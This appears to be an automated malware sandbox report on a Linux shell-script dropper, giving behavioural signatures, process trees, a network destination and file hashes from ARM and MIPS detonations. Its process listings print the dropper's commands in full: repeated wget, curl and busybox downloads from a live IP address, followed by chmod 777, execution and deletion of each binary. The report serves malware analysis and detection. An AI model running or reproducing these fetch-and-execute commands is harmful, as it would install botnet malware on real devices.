Analysis Overview
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
Threat Level: Shows suspicious behavior
The file 19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:12
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:15
Platform
debian9-armhf-20240611-en
Max time kernel
30s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/799-1-0xb66f9000-0xb670a044-memory.dmp
memory/823-2-0xb6725000-0xb6736044-memory.dmp
memory/837-3-0xb6788000-0xb6799044-memory.dmp
memory/843-4-0xb6780000-0xb6791044-memory.dmp
memory/867-5-0xb6734000-0xb6745044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:14
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
